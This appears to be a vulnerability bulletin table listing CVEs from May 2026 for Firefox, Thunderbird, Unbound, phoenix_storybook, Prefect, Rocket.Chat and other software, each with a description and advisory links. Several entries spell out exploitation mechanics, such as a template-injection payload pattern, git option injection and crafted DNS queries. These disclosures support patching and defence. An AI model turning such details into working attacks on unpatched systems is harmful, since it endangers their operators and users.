| Mozilla–Firefox | Integer overflow in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8949 | https://bugzilla.mozilla.org/show_bug.cgi?id=1355639 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Same-origin policy bypass in the Networking: HTTP component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8950 | https://bugzilla.mozilla.org/show_bug.cgi?id=1965430 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Spoofing issue in the Toolbar component in Firefox for Android. This vulnerability was fixed in Firefox 151. | 2026-05-19 | not yet calculated | CVE-2026-8951 | https://bugzilla.mozilla.org/show_bug.cgi?id=2018513 https://www.mozilla.org/security/advisories/mfsa2026-46/ |
| Mozilla–Firefox | Privilege escalation in the Application Update component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8952 | https://bugzilla.mozilla.org/show_bug.cgi?id=2021727 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Sandbox escape due to use-after-free in the Disability Access APIs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8953 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029511 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Incorrect boundary conditions, integer overflow in the Audio/Video component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8954 | https://bugzilla.mozilla.org/show_bug.cgi?id=2030747 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Privilege escalation in the DOM: Workers component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8955 | https://bugzilla.mozilla.org/show_bug.cgi?id=2031064 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Integer overflow in the Networking: JAR component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8956 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032427 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Privilege escalation in the Enterprise Policies component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8957 | https://bugzilla.mozilla.org/show_bug.cgi?id=2033850 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Information disclosure, sandbox escape in the Security: Process Sandboxing component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8958 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034713 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Sandbox escape due to incorrect boundary conditions in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8959 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034754 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Spoofing issue in WebExtensions. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8960 | https://bugzilla.mozilla.org/show_bug.cgi?id=1940116 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Spoofing issue in the Form Autofill component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8961 | https://bugzilla.mozilla.org/show_bug.cgi?id=1962625 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8962 | https://bugzilla.mozilla.org/show_bug.cgi?id=2004804 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8963 | https://bugzilla.mozilla.org/show_bug.cgi?id=2021222 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Spoofing issue in the Popup Blocker component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8964 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025170 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Information disclosure in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8965 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025740 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Information disclosure in the IP Protection component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8966 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025849 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Information disclosure in the Graphics: WebGPU component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8967 | https://bugzilla.mozilla.org/show_bug.cgi?id=2027173 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Denial-of-service due to invalid pointer in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8968 | https://bugzilla.mozilla.org/show_bug.cgi?id=2030467 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8969 | https://bugzilla.mozilla.org/show_bug.cgi?id=2031123 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Privilege escalation in the Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8970 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032174 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Same-origin policy bypass in the Networking: JAR component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8971 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032604 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Privilege escalation in the WebRTC: Audio/Video component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8972 | https://bugzilla.mozilla.org/show_bug.cgi?id=2033275 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Memory safety bugs present in Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8973 | Memory safety bugs fixed in Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla–Firefox | Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8974 | Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox | Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8975 | Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla–Firefox for iOS | Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user’s cookies. This vulnerability was fixed in Firefox for iOS 151.0. | 2026-05-19 | not yet calculated | CVE-2026-8706 | https://bugzilla.mozilla.org/show_bug.cgi?id=2036618 https://www.mozilla.org/security/advisories/mfsa2026-49/ |
| ngrok–ngrok v4.3.3 and 5.0.0-beta.2 | ngrok v4.3.3 and 5.0.0-beta.2 is vulnerable to Command Injection. | 2026-05-18 | not yet calculated | CVE-2025-57282 | https://www.npmjs.com https://gist.github.com/Dremig/90c2a0a2f85b0921f10e0bb3192a0c23 |
| NLnet Labs–Unbound | NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support (‘–enable-dnscrypt’). A bad DNSCrypt query could underflow Unbound’s DNSCrypt packet reading procedure that may lead to heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query that its decrypted plaintext consists entirely of ‘0x00’ bytes and does not contain the expected ‘0x80’ marker. Unbound would then start reading more bytes than necessary until it finds a non-‘0x00’ byte. Based on the underlying memory allocator and the memory layout, it could lead to heap overflow while reading followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound’s later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space. | 2026-05-20 | not yet calculated | CVE-2026-32792 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound 1.19.1 up to and including version 1.25.0 has a vulnerability in the DNSSEC validator that enables denial of service and possible remote code execution as a result of deep copying a data structure and erroneously overwriting a destination pointer. An adversary can exploit the vulnerability by controlling a malicious signed zone and querying a vulnerable Unbound. When DS sub-queries need to suspend validation due to NSEC3 computational budget exhaustion (introduced in Unbound 1.19.1), Unbound deep-copies response messages to preserve them across memory region teardown. A struct-assignment bug overwrites the destination’s pointer with the source’s pointer. After the sub-query region is freed, the resumed validator dereferences this dangling pointer, triggering a crash or potentially enabling arbitrary code execution. Unbound 1.25.1 contains a patch with a fix to preserve the correct pointer when deep copying the data structure. | 2026-05-20 | not yet calculated | CVE-2026-33278 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-33278.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound 1.16.2 up to and including version 1.25.0 has a vulnerability of the ‘ghost domain names’ family of attacks that could extend the ghost domain window by up to one cached TTL configured value. Similar to other ‘ghost domain names’ attacks, an adversary needs to control a (ghost) zone and be able to query a vulnerable Unbound. A single client NS query can cause Unbound to overwrite the cached expired parent-side referral NS rrset with the child-side apex NS rrset and essentially extend the ghost domain window by up to one cached TTL configured value (‘cache-max-ttl’). In configurations where ‘harden-referral-path: yes’ is used (non-default configuration), no client NS query is required since Unbound implicitly performs that query. Unbound 1.25.1 contains a patch with a fix that does not allow extension of TTLs for (parent) NS records regardless of their trust. | 2026-05-20 | not yet calculated | CVE-2026-40622 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-40622.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to a degradation of service attack related to parsing long lists of incoming EDNS options. An adversary sending queries with too many EDNS options can hold Unbound threads hostage while they are parsing and creating internal data structures for the options. Coordinated attacks can result in degradation and/or denial of service. Unbound 1.25.1 contains a patch with a fix to limit acceptable incoming EDNS options (100). | 2026-05-20 | not yet calculated | CVE-2026-41292 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-41292.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the jostle logic that could defeat its purpose and degrade resolution performance. Retransmits of the same query could renew the age of slow running queries and not allow the jostle logic to see them as aged and potential targets for replacement with new queries. An adversary who can query a vulnerable Unbound and who can control a domain name server that replies slowly and/or maliciously to Unbound’s queries can exploit the vulnerability and degrade the resolution performance of Unbound. When Unbound’s ‘num-queries-per-thread’ reaches its limit, the jostle logic kicks in. When a new query comes in, half of the available queries that are also slow to resolve are candidates for replacement. The vulnerability then happens because duplicate queries that need resolution would skew the aging result by using the timestamp of the latest duplicate query instead of the original one that started the resolution effort. Cache and local data response performance remains unaffected. Coordinated attacks could raise this to a denial of resolution service. Unbound 1.25.1 contains a patch with a fix to attach an initial, non-updatable start time for incoming queries that allow the jostle logic to work as intended. | 2026-05-20 | not yet calculated | CVE-2026-42534 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42534.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the DNSSEC validator where the code path to consult the negative cache for DS records does not take into account the limit on NSEC3 hash calculations introduced in 1.19.1. This leads to degradation of service during the attack. An adversary that controls a DNSSEC signed zone can exploit this by signing NSEC3 records with acceptably high iterations for child delegations and querying a vulnerable Unbound. Unbound will keep performing the allowed hash calculations on the NSEC3 records and will not limit the work by the mitigation introduced in 1.19.1. As a side effect, a global lock for the negative cache will be held for the duration of the hashing, blocking other threads that need to consult the negative cache. Coordinated attacks could raise the vulnerability to denial of service. Unbound 1.25.1 contains a patch with a fix to bound the vulnerable code path with the existing limit for NSEC3 hash calculations. | 2026-05-20 | not yet calculated | CVE-2026-42923 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42923.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a vulnerability that results in heap overflow when encoding multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options in the reply packet. The relevant options (‘nsid’, ‘answer-cookie’, ‘pad-responses’ (default)) need to be enabled for the vulnerability to be exploited. An adversary who can query Unbound can exploit the vulnerability by attaching multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options to the query. A flaw in the size calculation of the EDNS field truncates the correct value which allows the encoder to overflow the available space when writing. Those two combined lead to a heap overflow write of Unbound controlled data and eventually a crash. Unbound 1.25.1 contains a patch with a fix to de-duplicate the EDNS options and a fix to prevent truncation of the EDNS field size calculation. | 2026-05-20 | not yet calculated | CVE-2026-42944 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42944.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a denial of service vulnerability in the DNSSEC validator that can lead to a crash given malicious upstream replies. When Unbound constructs chase-reply messages for validation, the code uses the wrong counter to calculate write offsets for ADDITIONAL section rrsets. DNAME duplication could increase the ANSWER section count and authority filtering could decrease the AUTHORITY section count and create an uninitialized array slot. Combining these two, the validator later dereferences this uninitialized pointer, causing an immediate process crash. An adversary controlling a DNSSEC-signed domain can trigger this bug with a single query by configuring a DNAME chain with unsigned CNAMEs and a response containing unsigned AUTHORITY records alongside signed ADDITIONAL glue records. Unbound 1.25.1 contains a patch with a fix to use the proper counters to calculate the write offsets. | 2026-05-20 | not yet calculated | CVE-2026-42959 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42959.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to poisoning via promiscuous records for the authority section. Promiscuous RRSets that complement DNS replies in the authority section can be used to trick Unbound to cache such records. If an adversary is able to attach such records in a reply (i.e., spoofed packet, fragmentation attack) he would be able to poison Unbound’s cache. A malicious actor can exploit the possible poisonous effect by injecting RRSets other than NS that are also accompanied by address records in a reply, for example MX. This could be achieved by trying to spoof a reply packet or fragmentation attacks. Unbound would then accept the relative address records in the additional section and cache them if the authority RRSet has enough trust at this point, i.e., in-zone data for the delegation point. Unbound 1.25.1 contains a patch with a fix that disregards address records from the additional section if they are not explicitly relevant only to authority NS records, mitigating the possible poison effect. This is a complement fix to CVE-2025-11411. | 2026-05-20 | not yet calculated | CVE-2026-42960 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42960.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability when handling replies with very large RRsets that Unbound needs to perform name compression for. Malicious upstream responses with very large RRsets with records that don’t share a suffix above the root can cause Unbound to spend a considerable time applying name compression to downstream replies. This can lead to degraded performance and eventually denial of service in well orchestrated attacks. An adversary can exploit the vulnerability by querying Unbound for the specially crafted contents of a malicious zone with very large RRsets. Before Unbound replies to the query it will try to apply name compression which was an unbounded operation that could lock the CPU until the whole packet was complete. A compression limit was introduced in 1.21.1 for this but it didn’t account for the case where records would not share any suffix above the root. That causes Unbound to go in a different code path because of the compression tree lookup failure and eventually not increment the compression counter for those operations. Unbound 1.25.1 contains a patch with a fix that increments the compression counter regardless of the compression tree lookup. This is a complement fix to CVE-2024-8508. | 2026-05-20 | not yet calculated | CVE-2026-44390 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44390.txt |
| NLnet Labs–Unbound | NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a locking inconsistency vulnerability that when certain conditions are met (multi-threaded, RPZ XFR reload, RPZ zone with ‘rpz-nsip’/’rpz-nsdname’ triggers) it could result in heap use-after-free and eventual crash. An adversary can exploit the vulnerability if conditions are first met on a vulnerable Unbound, i.e., multi-threaded, an RPZ zone with ‘rpz-nsip’/’rpz-nsdname’ triggers and an ongoing XFR for that RPZ zone. Local RPZ files do not trigger the vulnerability. If the timing is right and an XFR happens at the same time another thread needs to read that RPZ zone, the reader may not hold the lock long enough and the thread applying the XFR may free objects that the reader is about to walk causing the use-after-free. Unbound 1.25.1 contains a patch with a fix to the locking code. | 2026-05-20 | not yet calculated | CVE-2026-44608 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44608.txt |
| NOVUS — AirGate 4G | Incorrect access control in the /uci/get/ endpoint of NOVUS AirGate 4G firmware v1.1.16 allows unauthenticated attackers to obtain administrator credentials via a crafted POST request. | 2026-05-18 | not yet calculated | CVE-2023-24215 | http://airgate.com http://novus.com https://github.com/sql3t0/cve-disclosures/blob/main/00_-_CVE-2023-24215.md |
| Offline Hospital Management System–Offline Hospital Management System 5.3.0 | Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands. | 2026-05-18 | not yet calculated | CVE-2026-26462 | https://sourceforge.net/projects/hospital-management-system/files/ https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4 |
| OpENer–OpENer v2.3-558-g1e99582 | OpENer v2.3-558-g1e99582 contains an out-of-bounds read vulnerability in the Common Packet Format (CPF) parser, specifically in CreateCommonPacketFormatStructure() in source/src/enet_encap/cpf.c. A crafted ENIP/CPF message can supply an attacker-controlled item_count value that is not consistently validated against the remaining data_length of the CPF slice | 2026-05-18 | not yet calculated | CVE-2026-38719 | https://github.com/EIPStackGroup/OpENer https://github.com/EIPStackGroup/OpENer/issues/558 |
| Perforce–P4 (Helix Core) | A Remote Code Execution vulnerability in P4 (Helix Core) Server’s Command-Line Client, prior to the 2025.2 Patch 2, has been fixed to address potential security risks. | 2026-05-18 | not yet calculated | CVE-2026-6902 | https://portal.perforce.com/s/cve/a91Qi000002zJB3IAM/code-injection-in-perforce-helix-core |
| phenixdigital–phoenix_storybook | Authorization Bypass Through User-Controlled Key vulnerability in phenixdigital phoenix_storybook allows cross-session PubSub topic injection via a URL query parameter. ‘Elixir.PhoenixStorybook.Story.ComponentIframeLive’:handle_params/3 in lib/phoenix_storybook/live/story/component_iframe_live.ex reads a PubSub topic directly from params[“topic”] and broadcasts {:component_iframe_pid, self()} on it with no check that the topic belongs to the requesting session. The shared PhoenixStorybook.PubSub is used to coordinate playground LiveViews with their iframes: a playground subscribes to a session-specific topic and uses the received iframe pid to direct subsequent control messages (variation state, theme switches, extra-assign payloads) via send/2. Because the iframe trusts the query parameter, an attacker who loads /storybook/iframe/<story>?topic=<victim_topic> causes their iframe process pid to be announced on the victim’s topic. The victim’s playground then addresses its private messages to the attacker’s iframe process. This issue affects phoenix_storybook from 0.4.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-47068 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-mrhx-6pw9-q5fh https://cna.erlef.org/cves/CVE-2026-47068.html https://osv.dev/vulnerability/EEF-CVE-2026-47068 https://github.com/phenixdigital/phoenix_storybook/commit/6ee03f1c738d4436dde1b066cf65c80663d489f5 |
| phenixdigital–phoenix_storybook | Code Injection vulnerability in phenixdigital phoenix_storybook allows unauthenticated remote code execution via unsanitized attribute value interpolation in HEEx template generation. The psb-assign WebSocket event handler in ‘Elixir.PhoenixStorybook.Story.PlaygroundPreviewLive’:handle_event/3 accepts arbitrary attribute names and values from unauthenticated clients. These values are passed to ‘Elixir.PhoenixStorybook.Helpers.ExtraAssignsHelpers’:handle_set_variation_assign/3, which stores them verbatim. When rendering, ‘Elixir.PhoenixStorybook.Rendering.ComponentRenderer’:attributes_markup/1 interpolates binary attribute values directly into a HEEx template string as name=”<val>” without escaping double quotes or HEEx expression delimiters. An attacker can supply a value containing a closing quote followed by a HEEx expression block (e.g. foo” injected={EXPR} bar=”), which causes EXPR to be treated as an inline Elixir expression. The resulting template is compiled via EEx.compile_string/2 and executed via Code.eval_quoted_with_env/3 with full Kernel imports and no sandbox, giving the attacker arbitrary code execution on the server. This issue affects phoenix_storybook from 0.5.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-8467 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-55hg-8qxv-qj4p https://cna.erlef.org/cves/CVE-2026-8467.html https://osv.dev/vulnerability/EEF-CVE-2026-8467 https://github.com/phenixdigital/phoenix_storybook/commit/56ab8464d4375fa52db806148a06cce126ad481d |
| phenixdigital–phoenix_storybook | Allocation of Resources Without Limits or Throttling vulnerability in phenixdigital phoenix_storybook allows unauthenticated denial-of-service via BEAM atom table exhaustion. Multiple LiveView event handlers convert user-supplied event parameter strings to atoms using String.to_atom/1 without validation: ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:handle_set_variation_assign/3 interns every key of the psb-assign params map; ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:handle_toggle_variation_assign/3 interns the “attr” value from psb-toggle events; ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:to_variation_id/2 interns elements of “variation_id”; and ‘Elixir.PhoenixStorybook.ExtraAssignsHelpers’:to_value/4 interns raw string values for attributes declared as :atom or :boolean. BEAM atoms are never garbage-collected, so each unique attacker-controlled string is a permanent allocation. Once the atom table ceiling (~1,048,576 atoms) is reached, the entire BEAM node aborts, taking down all applications running on it. This issue affects phoenix_storybook from 0.2.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-8469 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-833p-95jq-929q https://cna.erlef.org/cves/CVE-2026-8469.html https://osv.dev/vulnerability/EEF-CVE-2026-8469 https://github.com/phenixdigital/phoenix_storybook/commit/96d524690af0fe197a49f60d18e564a620b9ef81 |
| prefecthq–prefecthq/prefect | A vulnerability in the `GitHubRepository` block of the `prefect-github` integration in Prefect version 3.6.18 allows an attacker to inject arbitrary git command-line options via the `reference` field. The `reference` field is concatenated directly into a `git clone` command string without proper sanitization, and then parsed by `shlex.split()`. This enables injection of options such as `-c`, leading to potential Server-Side Request Forgery (SSRF), credential theft, or remote code execution (RCE). The vulnerability affects both the `aget_directory()` and `get_directory()` methods in `src/integrations/prefect-github/prefect_github/repository.py`. This issue does not affect the GitLab and BitBucket integrations, which use a safer list-based command construction approach. | 2026-05-24 | not yet calculated | CVE-2026-3515 | https://huntr.com/bounties/f3b048b8-7f4e-45ef-a5a7-cb841c39acde |
| PrestaShop–upsshipping module | An issue in prestashop upsshipping all versions through at least 2.4.0 allows a remote attacker to obtain sensitive information via the /modules/upsshipping/logs/, and /modules/upsshipping/lib/UPSBaseApi.php components | 2026-05-18 | not yet calculated | CVE-2026-39079 | https://labs.esokia.com/cve/cve-2026-39079/ |
| Rocket.Chat–Rocket.Chat | The /api/v1/autotranslate.translateMessage endpoint in versions <8.5.0, <8.4.2, <8.3.4, <8.2.4, <8.1.5, <8.0.6, <7.13.8, and <7.10.12 allows any authenticated user to retrieve the full content of any message from any room (private groups, direct messages, channels) by simply providing the target message ID. The endpoint fetches the message via Messages.findOneById(messageId) with no room access check (canAccessRoomIdAsync is never called), returning the complete IMessage object including message text, sender info, room ID, timestamps, and markdown content. | 2026-05-19 | not yet calculated | CVE-2026-32994 | https://hackerone.com/reports/3713682 |
| RRWO–Crypt::SaltedHash | Crypt::SaltedHash versions through 0.09 for Perl generate insecure random values for salts. These versions use the built-in rand function, which is predictable and unsuitable for cryptography. | 2026-05-20 | not yet calculated | CVE-2026-47372 | https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes https://github.com/robrwo/perl-Crypt-SaltedHash/commit/9b68437d2cd420b819b3a795474c3870338d38d5.patch |
| RRWO–Crypt::SaltedHash | Crypt::SaltedHash versions through 0.09 for Perl is susceptible to timing attacks. These versions use Perl’s built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash. | 2026-05-20 | not yet calculated | CVE-2026-47373 | https://metacpan.org/release/RRWO/Crypt-SaltedHash-0.10/changes https://github.com/robrwo/perl-Crypt-SaltedHash/commit/c07bfc5c23185b0667233d0f2e1252d81f1f027a.patch |
